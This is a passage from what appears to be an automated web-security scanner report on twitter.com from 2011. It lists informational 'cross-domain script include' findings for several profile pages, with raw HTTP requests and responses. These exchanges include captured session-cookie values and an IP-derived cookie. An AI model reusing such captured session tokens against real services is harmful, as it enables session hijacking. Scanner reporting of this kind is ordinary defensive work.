Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266001-12668-52676
ETag: "dfd5f78ed0c4ed8b98562bddfee9b7e2"
Last-Modified: Sat, 29 Jan 2011 01:53:21 GMT
X-Runtime: 0.01149
Content-Type: text/html; charset=utf-8
Content-Length: 49303
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.502. http://twitter.com/mattbanks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /mattbanks

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mattbanks HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225020-89730-48319
ETag: "ec0575d0afb2bf3f6fc09ae312d729c0"
Last-Modified: Fri, 28 Jan 2011 14:30:20 GMT
X-Runtime: 0.01604
Content-Type: text/html; charset=utf-8
Content-Length: 50027
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.503. http://twitter.com/mattbanks/status/28168049634844672

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /mattbanks/status/28168049634844672

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mattbanks/status/28168049634844672 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225023-49309-63525
ETag: "2ac504ed19bb0d5737b54925ddf2dbee"
Last-Modified: Fri, 28 Jan 2011 14:30:23 GMT
X-Runtime: 0.06537
Content-Type: text/html; charset=utf-8
Content-Length: 13691
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWF0dGJhbmtz%250AL3N0YXR1cy8yODE2ODA0OTYzNDg0NDY3MjoMY3NyZl9pZCIlMjQzOTBlZDZh%250ANWJhODhmMzZjMTQyNDJjYTViZTE2Y2M6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6%250AB2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--345453cec4138598b9a08c29980df4c39c3aba90; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.504. http://twitter.com/mattbanks/status/28168049634844672

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /mattbanks/status/28168049634844672

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mattbanks/status/28168049634844672 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225157-62292-35182
ETag: "b8970d7a65e80fb208b3104a2d57f965"
Last-Modified: Fri, 28 Jan 2011 14:32:37 GMT
X-Runtime: 0.05089
Content-Type: text/html; charset=utf-8
Content-Length: 13691
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWF0dGJhbmtz%250AL3N0YXR1cy8yODE2ODA0OTYzNDg0NDY3MjoMY3NyZl9pZCIlYjYxYzUwZmM2%250AOGM2MmFhYzU5YTdlMWRlMGE5ZTkwYzY6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--1daa0712bad3c6d625e4b76d8d794650b60a75f6; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.505. http://twitter.com/mennovanslooten

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /mennovanslooten

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mennovanslooten HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:12:32 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234752-93013-22360
ETag: "f6c7786f8d85f8add292b27d40873465"
Last-Modified: Fri, 28 Jan 2011 17:12:32 GMT
X-Runtime: 0.01088
Content-Type: text/html; charset=utf-8
Content-Length: 48209
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.506. http://twitter.com/mennovanslooten

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /mennovanslooten

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mennovanslooten HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:10 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225070-8349-1627
ETag: "d5a74d3b21022a46e5228042d143d163"
Last-Modified: Fri, 28 Jan 2011 14:31:10 GMT
X-Runtime: 0.01281
Content-Type: text/html; charset=utf-8
Content-Length: 48347
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.507. http://twitter.com/messengerpost

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /messengerpost

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /messengerpost HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225043-32375-15875
ETag: "e9683276160c0ad3462c344153ccbcdb"
Last-Modified: Fri, 28 Jan 2011 14:30:43 GMT
X-Runtime: 0.01196
Content-Type: text/html; charset=utf-8
Content-Length: 50655
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.508. http://twitter.com/messengerpost

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /messengerpost

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /messengerpost HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234694-97457-54539
ETag: "ef3094a1f07023e4a368fdd33e0084cb"
Last-Modified: Fri, 28 Jan 2011 17:11:34 GMT
X-Runtime: 0.00871
Content-Type: text/html; charset=utf-8
Content-Length: 50125
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.509. http://twitter.com/miketaylr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /miketaylr

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /miketaylr HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
